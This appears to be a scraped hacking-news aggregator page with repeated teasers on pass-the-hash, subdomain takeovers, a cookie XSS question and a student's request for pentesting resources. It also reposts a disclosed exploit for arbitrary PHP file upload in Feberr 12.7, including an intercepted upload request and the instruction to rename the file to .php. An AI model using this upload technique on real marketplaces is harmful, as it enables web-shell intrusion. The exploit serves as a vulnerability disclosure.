Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
UnderRated Tool For Pass-The-Hash[Evil-WinRM]
First Of all I’ll Describe What is Pass-The-Hash Attack
Continue reading on Medium »
UnderRated Tool For Pass-The-Hash[Evil-WinRM]
First Of all I’ll Describe What is Pass-The-Hash Attack
Continue reading on Medium »
Subdomain Takeover Bugs — When They’re Applicable And When They’re Not
https://medium.com/immunefi/subdomain-takeover-bugs-when-theyre-applicable-and-when-they-re-not-1e6ce42de503?source=rss------bug_bounty-5
https://medium.com/immunefi/subdomain-takeover-bugs-when-theyre-applicable-and-when-they-re-not-1e6ce42de503?source=rss------bug_bounty-5
At Immunefi, we receive a large number of reports from whitehats regarding subdomain takeovers. But we have a policy of always marking…Continue reading on Immunefi » (https://medium.com/immunefi/subdomain-takeover-bugs-when-theyre-applicable-and-when-they-re-not-1e6ce42de503?source=rss------bug_bounty-5)
[Bugbounty]SSRF — IFRAME INJECTION E XSS REFLECTED
https://medium.com/@kauenavarro/bugbounty-ssrf-iframe-injection-e-xss-reflected-4f107b380ba?source=rss------bug_bounty-5
https://medium.com/@kauenavarro/bugbounty-ssrf-iframe-injection-e-xss-reflected-4f107b380ba?source=rss------bug_bounty-5
Hoje vou falar um pouco de uma falha que me levou a dois relatórios infelizmente ambos foram duplicados porém ficou de experiência e…Continue reading on Medium » (https://medium.com/@kauenavarro/bugbounty-ssrf-iframe-injection-e-xss-reflected-4f107b380ba?source=rss------bug_bounty-5)
hacking: security in practice
Learning hacking the "right way"
Hi, I'm a high school student and I've been interested in computer science for almost two years now, and "recently" got into ethical hacking and specifically pen-testing. So, I know that learning a field like this is not easy, so I'm kind of skeptical about online courses. I think for me a more traditional way of learning would be more effective, but c'mon I don't want to wait until university, I'm just too interested to wait, and just like I learned programming, I think I'll be able to learn at least something about pen-testing... given the right tools tho. So, do you have some tips on where to find the material? I first thought of the university syllabuses while looking at the courses themselves for roadmaps, but I don't know if I'll be able to get everything I need (of course I prefer free stuff, so I'll think twice before buying stuff I don't know if it'll be useful or not), so maybe there's a better option...
submitted by /u/Dumb-Ptr
[link] [comments]
Learning hacking the "right way"
Hi, I'm a high school student and I've been interested in computer science for almost two years now, and "recently" got into ethical hacking and specifically pen-testing. So, I know that learning a field like this is not easy, so I'm kind of skeptical about online courses. I think for me a more traditional way of learning would be more effective, but c'mon I don't want to wait until university, I'm just too interested to wait, and just like I learned programming, I think I'll be able to learn at least something about pen-testing... given the right tools tho. So, do you have some tips on where to find the material? I first thought of the university syllabuses while looking at the courses themselves for roadmaps, but I don't know if I'll be able to get everything I need (of course I prefer free stuff, so I'll think twice before buying stuff I don't know if it'll be useful or not), so maybe there's a better option...
submitted by /u/Dumb-Ptr
[link] [comments]
Reddit
From the hacking community on Reddit
Explore this post and more from the hacking community
hacking: security in practice
xss on cookie
It's my first time to post here and sorry for dumb question. is this a valid xss?
HTTP request
GET / HTTP/2 Host: test.com ... Cookie: UUID:abc
HTTP response is like
HTTP/2 200 OK Set-cookie: UUID=abc ... ....
submitted by /u/xxxx_Blank_xxxx
[link] [comments]
xss on cookie
It's my first time to post here and sorry for dumb question. is this a valid xss?
HTTP request
GET / HTTP/2 Host: test.com ... Cookie: UUID:abc
HTTP response is like
HTTP/2 200 OK Set-cookie: UUID=abc ... ....
submitted by /u/xxxx_Blank_xxxx
[link] [comments]
reddit
xss on cookie
It's my first time to post here and sorry for dumb question. is this a valid xss? HTTP request GET / HTTP/2 Host: test.com ... Cookie:...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Feberr 12.7 Shell Upload
https://4.bp.blogspot.com/-I-n26yI3Cmk/WWlvWxoCyUI/AAAAAAAAIOM/Fl6K91g5v_sGMssa7qzCkbxeapM4aUyUACLcBGAs/s1600/h50.png
Feberr version 12.7 suffers from a remote shell upload vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Feberr 12.7 Shell Upload
https://4.bp.blogspot.com/-I-n26yI3Cmk/WWlvWxoCyUI/AAAAAAAAIOM/Fl6K91g5v_sGMssa7qzCkbxeapM4aUyUACLcBGAs/s1600/h50.png
Feberr version 12.7 suffers from a remote shell upload vulnerability.
MD5 |
1e6ac2a7255ff92cbf7fabd5b44df251Download
# Exploit Title: Feberr - Multivendor Digital Products Marketplace arbitrary file upload
# Version 12.7
# Google Dork: N/A
# Date: 24/01/2022
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://www.codester.com/items/14224/feberr-multivendor-digital-products-marketplace
# Software link 2 :https://www.codecanor.com/product/feberr-multivendor-digital-products-marketplace/
# Software Demo : https://overtasks.com/demo/feberr
# Category: webapps
Feberr - Multivendor Digital Products Marketplace contain arbitrary file upload
registered vendor can upload .php files in edit-item section using tinymce with use of intercept tool in burbsuite to edit the raw
details
after register as vendor on the system go and edit or add an item in the section of detailes there tinymce
direct link :
https://localhost/feberr/edit-item/
POST /demo/feberr/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------429310566417994448462725662126
Content-Length: 179156
Origin: https://overtasks.com
Connection: close
Referer: https://localhost /demo/feberr/edit-item/PFRLZAmzwdWFNWnlgxUaxbLIO
Cookie: XSRF-TOKEN=eyJpdiI6InNxSGJaQjZ0UDYzamhnT2lXL09FWmc9PSIsInZhbHVlIjoiOEZCSVBnL3orczdpc2p4RE40ZmhlWCtKck1UNURET2EwWTdyeEtDVUR0Q1pMa2RLSXphSjNTbWJnRVlNS3Jld1U2d1lucWRNMDg1RVUybWdXTlMzMDAzUHcrdjNiM0IyWXRDbk01dzJJZU0zK3ZOWFlVM2JkTFRTZzdMMGhmN1UiLCJtYWMiOiIzYzU2ZTFkNThjZGQ5ZTI0ZWNiNzUzNWEyM2E4ZTk0OTZlZWYzMDc2NDAxOWU5NjZhNjkzNzQ5ZTIzMTA2NGRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNKa1RRUHgvVStWYy85MkNuVFI2RlE9PSIsInZhbHVlIjoiUk8vMWMrS0NNLzczUWdSdFBnck1sSmdzVUhkckdQYUtORlczSGFDNWRJN1MvbGx0VGFNUkVCTS9jb1I3L25PbkdBc29hODltMXVTTVlxQVlIQ1FSaWtmVWwzWkNYVUlOQUk2Q04zbmwxdzRSQXdiRTF4WVhTTy9IaWp0V2dwM0UiLCJtYWMiOiIzMDY1ODI4ODkwZTczNjJkNjZhYmE3YjJiZWFiNzA0ODNhNTdmY2RkYjFhMmFlODQ3MTg1OTAyMDFiNWM1NjMwIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------429310566417994448462725662126
Content-Disposition: form-data; name="file"; filename="blobid1643057738041.jpg" >>>>>>>>>>>>>>> CHANGE THIS TO .php
Content-Type: image/jpeg
you will have the direct link to your uploaded file using tinymce editor
Source:packetstormsecurity.com
Beethoven X Joins Balancer Labs’ Bug Bounty Program
In April 2021, Balancer Labs decided to go big in pursuit of uncovering vulnerabilities in their V2 Vault architecture with the launch of…Continue reading on Balancer Protocol »
Read more...
In April 2021, Balancer Labs decided to go big in pursuit of uncovering vulnerabilities in their V2 Vault architecture with the launch of…Continue reading on Balancer Protocol »
Read more...